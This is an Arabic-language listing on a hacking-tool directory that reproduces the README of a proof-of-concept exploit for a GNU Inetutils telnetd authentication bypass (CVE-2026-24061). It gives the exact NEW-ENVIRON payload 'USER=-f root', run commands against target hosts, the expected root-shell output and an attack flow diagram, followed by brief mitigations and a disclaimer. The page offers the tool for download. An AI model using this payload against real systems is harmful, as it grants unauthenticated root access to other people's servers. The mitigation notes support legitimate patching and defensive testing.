Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/mbanyamer/cve-2026-24061-gnu-inetutils-telnetd-remote-authentication-bypass-root-shell-
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةأداة الوصول عن بعد
GitHubmbanyamer/cve-2026-24061-gnu-inetutils-telnetd-remote-authentication-bypass-root-shell-

CVE-2026-24061-GNU-Inetutils-telnetd-Remote-Authentication-Bypass-Root-Shell-

إثبات مفهوم لاستغلال تجاوز المصادقة في GNU Inetutils telnetd (CVE-2026-24061) والذي يفتح غلاف جذر عبر متغير USER المُعدّل في NEW-ENVIRON.

عرض المستودع
6منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Author Role Country Platform Vulnerability CVE CVSS Status


🧨 نظرة عامة

يحتوي هذا المستودع على استغلال إثبات المفهوم (PoC) لثغرة تجاوز المصادقة عن بُعد في GNU Inetutils telnetd.

تنشأ المشكلة لأن telnetd لا يعقّم متغير البيئة USER المستلم عبر تفاوض Telnet NEW‑ENVIRON بشكل صحيح قبل استدعاء /bin/login.

من خلال توفير:

root@kitploit:~
USER=-f root

ينفّذ telnetd فعليًا:

root@kitploit:~
/bin/login -f root

مما يتجاوز المصادقة ويمنح جذر (root shell) فوريًا.

  • المنتج: GNU Inetutils telnetd
  • الإصدارات المتأثرة: ≤ 2.7
  • المنفذ: 23/TCP
  • المصادقة: غير مطلوبة
  • الأثر: تجاوز المصادقة ← جذر (Root Shell)
  • الصلاحيات: root
  • CVE: CVE‑2026‑24061
  • CVSS: 9.8 (حرجة)

⚙️ التفاصيل التقنية

يتيح Telnet NEW‑ENVIRON للعملاء تعيين متغيرات البيئة أثناء تفاوض الجلسة.

يمرر telnetd الثغرة متغير USER مباشرة إلى login:

root@kitploit:~
/bin/login -f "$USER"

يحدد المهاجم:

root@kitploit:~
USER=-f root

النتيجة:

root@kitploit:~
/bin/login -f root

يخبر العلم -f برنامج login بـتخطي المصادقة، مما يمنح وصولًا بصلاحيات الجذر.


📦 المتطلبات

  • Python 3
  • telnetlib (مكتبة قياسية)
  • هدف يعمل بنظام inetutils‑telnetd الثغرة ≤ 2.7
  • خدمة Telnet قابلة للوصول عبر TCP/23

لا توجد تبعيات خارجية مطلوبة.


🚀 الاستخدام

1️⃣ تشغيل الاستغلال

root@kitploit:~
python3 cve-2026-24061.py 192.168.1.100

2️⃣ منفذ اختياري

root@kitploit:~
python3 cve-2026-24061.py example.com 23

3️⃣ النتيجة المتوقعة

إذا كان الهدف ثغرة:

root@kitploit:~
# id
uid=0(root) gid=0(root)
#

لديك الآن جذر تفاعلي (root shell).


🧪 مثال

root@kitploit:~
python3 cve-2026-24061.py 10.10.10.20

المخرجات:

root@kitploit:~
[+] Connected to 10.10.10.20:23
[+] Sent malicious USER=-f root via NEW-ENVIRON
[+] Negotiation complete - entering interactive shell
#

🧯 ملاحظات

  • الاستغلال فوري
  • لا حاجة لتجربة القوة الغاشمة
  • لا حاجة لبيانات اعتماد
  • لوحظ استغلاله في البرية
  • يعمل على تثبيتات Debian/Ubuntu الافتراضية لـ inetutils‑telnetd
  • يفشل إذا تم تصحيح telnetd أو استبداله (مثل OpenBSD telnetd)

🛡️ التخفيف

  • ترقية GNU Inetutils ≥ 2.8
  • تعطيل خدمة telnet
  • الاستبدال بـ SSH
  • حظر TCP/23 في جدار الحماية
  • تدقيق حزم inetutils‑telnetd

📊 مخطط تدفق هجوم PoC

root@kitploit:~
sequenceDiagram
    participant A as Attacker
    participant T as Target telnetd
    participant L as /bin/login
    participant R as Root Shell

    A->>T: Connect TCP/23
    A->>T: Telnet NEW-ENVIRON USER=-f root
    T->>L: Execute /bin/login -f root
    L-->>T: Auth bypass success
    T-->>R: Spawn root shell
    R-->>A: Interactive root session

⚠️ إخلاء مسؤولية

يُقدَّم هذا الاستغلال للأغراض التالية:

  • البحث الأمني
  • اختبار الاختراق المصرح به
  • التحقق الدفاعي

الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن لاختبارها غير قانوني.

تنزيل الأداة